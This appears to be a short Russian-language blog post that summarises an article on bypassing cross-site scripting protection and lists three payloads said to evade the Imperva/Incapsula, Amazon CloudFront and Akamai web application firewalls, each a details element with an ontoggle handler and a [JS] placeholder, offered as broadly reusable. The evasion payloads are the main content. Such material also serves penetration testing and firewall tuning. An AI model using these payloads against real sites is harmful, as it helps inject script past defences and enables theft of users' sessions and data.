Статья по байпассу средств защиты от XSS для некоторых кейсов. Как итог, получаем несколько довольно универсальных пэйлодов, которые могут пригодится вам и в других случаях (мне пригодились):

Imperva & Incapsula:
<details/open/id="&quot;"ontoggle=[JS]>

Amazon Cloudfront
<details/open/id="&quot;"ontoggle=[JS]>

Akamai
<details open id="' &quot;'"ontoggle=[JS]>

Еще больше байпассов для XSS доступно в репозитории на GitHub.



*

Отправить комментарий (0)
Новые Старые